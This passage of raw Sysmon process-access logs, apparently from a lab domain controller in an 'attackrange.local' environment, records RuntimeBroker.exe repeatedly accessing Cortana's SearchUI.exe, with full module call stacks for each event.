|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245644C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245692C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245644C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245692C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245640C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245640C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 